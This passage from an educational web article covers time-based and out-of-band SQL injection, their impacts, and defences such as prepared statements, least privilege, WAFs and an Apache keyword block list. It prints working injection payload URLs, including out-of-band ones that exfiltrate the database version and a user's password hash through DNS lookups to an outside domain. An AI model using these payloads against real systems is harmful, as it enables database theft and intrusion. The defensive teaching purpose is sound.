stated amount of time before responding. If the page is not vulnerable, it will load quickly; if it is vulnerable it will take longer than usual to load. This enables hackers to extract data, even though there are no visible changes on the page. The SQL syntax can be similar to the one used in the Boolean-Based SQL Injection Vulnerability.But to set a measurable sleep time, the ‘true’ function is changed to something that takes some time to execute, such as ‘sleep(3)’ which instructs the database to sleep for three seconds:https://techandsecurity.net/index.php?id=1+AND+IF(version()+LIKE+'5%',sleep(3),false)If the page takes longer than usual to load it is safe to assume that the database version is 5.X.Out-of-Band SQL Injection VulnerabilitySometimes the only way an attacker can retrieve information from a database is to use out-of-band techniques. Usually, these types of attacks involve sending the data directly from the database server to a machine that is controlled by the attacker. Attackers may use this method if an injection does not occur directly after the supplied data is inserted, but at a later point in time.Out-of-Band Examplehttps://techandsecurity.net/index.php?id=1+AND+(SELECT+LOAD_FILE(concat('\\',(SELECT @@version),'techandsecurity.net\'))) https://www.techandsecurity.net/index.php?query=declare @pass nvarchar(100);SELECT @pass=(SELECT TOP 1 password_hash FROM users);exec('xp_fileexist ''\' + @pass + '.techandsecurity.net\c$\boot.ini''') In these requests, the target makes a DNS request to the attacker-owned domain, with the query result inside the subdomain. This means that an attacker does not need to see the result of the injection, but can wait until the database server sends a request instead.Impacts of SQL Injection VulnerabilityThere are a number of things an attacker can do when exploiting a SQL injection on a vulnerable website. Usually, it depends on the privileges of the user the web application uses to connect to the database server. By exploiting a SQL injection vulnerability, an attacker can:Add, delete, edit, or read content in the database.Read source code from files on the database server.Write files to the database server.It all depends on the capabilities of the attacker, but the exploitation of a SQL injection vulnerability can even lead to a complete takeover of the database and web server. You can learn more useful tips on how to test the impact of an SQL injection vulnerability on your website by referring to the SQL injection cheat sheet.READ ALSO Concept Behind Cross-Site Request Forgery.A good way to prevent damage is to restrict access as much as possible (for example, do not connect to the database using the sa or root account). It is also sensible to have different databases for different purposes (for example, separating the database for the shop system and the support forum of your website).Preventing SQL Injection VulnerabilitiesServer-side scripting languages are not able to determine whether the SQL query string is malformed. All they can do is send a string to the database server and wait for the interpreted response.Surely, there must be a way to simply sanitize user input and ensure a SQL injection is infeasible. Unfortunately, that is not always the case. There are perhaps an infinite number of ways to sanitize user input, from globally applying PHP’s addslashes() to everything (which may yield undesirable results), all the way down to applying the sanitization to “clean” variables at the time of assembling the SQL query itself, such as wrapping the above $_GET['id'] in PHP’s mysql_escape_string() function. However, applying sanitization at the query itself is a very poor coding practice and difficult to maintain or keep track of. This is where database systems have employed the use of prepared statements.Using Prepared Statements as SQL Injection PreventionWhen you think of prepared statements, think of how printf works and how it formats strings. Literally, you assemble your string with placeholders for the data to be inserted, and apply the data in the same sequence as the placeholders. SQL prepared statements operate on a very similar concept, where, instead of directly assembling your query string and executing it, you store a prepared statement, feed it with the data, and it assembles and sanitizes it for you upon execution. Great! Now there should never be another SQL injection again. So why, then, are SQL injection attacks still constantly one of the biggest and most prevalent attack methods?Insecure SQL Queries Are a ProblemSimply put, it perhaps boils down to web application developer laziness and lack of education and awareness. Insecure SQL queries are so extremely easy to create, and secure SQL queries are still mildly complex (or at least more complex than generic and typical in-line and often insecure queries). In the examples above, a malicious hacker can inject anything he or she desires in the same line as the SQL query itself.Example and Explanation of a SQL Prepared StatementHowever, with prepared statements, there are multiple steps. No major database system operates likeprintf(with everything occurring within the same statement on the same line). MySQL, directly, requires at least two commands (one PREPARE and one EXECUTE). PHP, via the PDO library, also requires a similar stacking approach, such as the following:$stmt = $dbh->prepare("SELECT * FROM users WHERE USERNAME = ? AND PASSWORD = ?"); $stmt->execute(array($username, $password)); At first glance, this is not inherently problematic and, on average, increases each SQL query by only an extra line or two. However, as this requires extra caution and effort on behalf of already tired and taxed developers, often times they may get a little lazy and cut corners, opting, instead, to just use the easy procedural mysql_query() as opposed to the more advanced object-oriented PDO prepare().Besides this, many developers just stick with what they know to get the job done and they generally learn the easiest and most straightforward way to execute SQL queries rather than showing genuine interest in improving what they know. But this could also be an issue of lack of awareness.Deeper Into the Rabbit Hole of SQL Injection SecuritySay, however, this isn’t a case of lazy developers or even a lack of prepared statements — or, more precisely, say the software itself and its security is out of your hands. Perhaps it is impractical or infeasible to completely secure the SQL queries in the code you use (by one comparison, Drupal has had over 20,000 lines of code committed, WordPress has had over 60,000 lines, and Joomla! has had over 180,000 lines), or, it may simply be impossible because it is encoded, etc., etc. Whatever the case is if you do not have control over the code you may need to employ different, more advanced “outside the box” protections.Non-Development Related SQL Injection ProtectionRunning Updated SoftwareFirst and foremost, always ensure you are running the most up-to-date software you can. If you are using WordPress or any other CMS framework, keep it updated! The same goes for PHP, your web server software such as Apache and nginx, and your database server (MySQL, Postgres, or others). The more recent the version of your software is the less chance of having a vulnerability or at least a widely-known one. This also extends down to your other software as well, such as SSH, OpenSSL, Postfix, and even the operating system itself.READ ALSO What is AWS Firecracker for Serverless Computing?Block URLs at the Web Server LevelNext, you should employ methods to ensure you are as minimally vulnerable to potential SQL injection attacks as possible. You could perhaps go for a quick and easy match against common SQL query keywords in URLs and just simply block them. For example, if you run Apache as your web server, you could use the following two mod_rewrite lines in your VirtualHost directive, as explained below:RewriteCond %{QUERY_STRING} [^a-z] (declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC] RewriteRule (.*) - [F] This is indeed quite clever, but it does not protect against everything. SQL injection parameters can still be passed via POST values or other RESTful-type URLs, not to mention there are tons of different ways to bypass this kind of generic blacklisting.Securing the Database and PrivilegesYou can also ensure your database itself is as secure as possible. In the information security field, there exists a concept known as the principle of least privilege. Effectively, this principle states that a user or program should have only the absolute very least amount of privileges necessary to complete its tasks. We already do this practically every day with Linux file permissions, so the concept is in no way foreign, and is equally applicable to databases. There is probably no reason why your logging functionality should have anything beyond INSERT privileges, so you should not simply GRANT ALL PRIVILEGES because it is easier.Segregating Sensitive and Confidential DataSimilarly, you might consider separation of data as a defense in depth approach, rather than conglomerating it into a single source. When you step back and think about it, it is probably not a very wise idea to keep your (hopefully PCI-compliant) customer credit card data stored in the same database as your forums, which are running an outdated and highly vulnerable version of phpBB, right? Not only would the principle of least privilege be very applicable in this situation, but even going so far as to entirely separate out your more sensitive data is a very sage approach. To think about it another way, would you keep all your most important paperwork inside your house, or would you keep some in a safety deposit box, too? The same concept applies to sensitive data.Analyzing HTTP Requests Before Hitting the Web ApplicationAnother option is the use of more detailed firewall systems. Typically this might include some adaptive solution that rides on top of iptables or ipfw (depending on whether you are using Linux or a BSD variant, respectively), or perhaps a reactive Host Intrusion Detection System (HIDS) such as OSSEC, although these are often more complicated than desired and not exactly purpose-built for these uses. Instead, you may wish to utilize a Web Application Firewall, which is designed specifically for these tasks. While there exist several enterprise-level solutions that are both a WAF and database firewall (sitting between your web application and your database), there are many open-source solutions, such as ModSecurity and IronBee, that perform remarkably well.The Truth About SQL Injection Web VulnerabilitiesEven though we have just provided examples of how to prevent the exploitation of SQL injection vulnerabilities, there is no magic wand.PHP, however, is attempting a new, aggressive approach. Since PHP 5.5, procedural MySQL has been deprecated and will soon be removed entirely. This means that future software projects will need to be switched to either MySQLi or PDO MySQL in order to continue to work. This is a positive development since it forces developers into a system that handles prepared statements with relative ease – though it still requires stacking a few operations. However, since many developers adopt a ‘code golf’ style (attempting to code in as few lines or characters as possible), many unfortunately will still opt for a single-line straight query over a two-line prepared statement.There are other options that can account for development shortcomings, including but not limited to: privilege limitations, data separation, web application firewalls, and many other approaches. But until these options are employed as consistently as SQL injection attacks, it may never be the case that injection-style attacks escape OWASP’s Top 10 list.Be the change that is needed to ensure data and web application security, and keep your databases safe from SQL injections!Vulnerability Classification and Severity TableCLASSIFICATIONID/SEVERITYPCI v3.16.5.1PCI v3.26.5.1OWASP 2013A1CWE89CAPEC66WASC19HIPAA164.306(a), 164.308(a)CVSS 3.0 ScoreBase10 (Critical)Temporal10 (Critical)Environmental10 (Critical)CVSS Vector StringCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HHave something to say about this article? Comment below or share it with us on Facebook or our WhatsappGroup.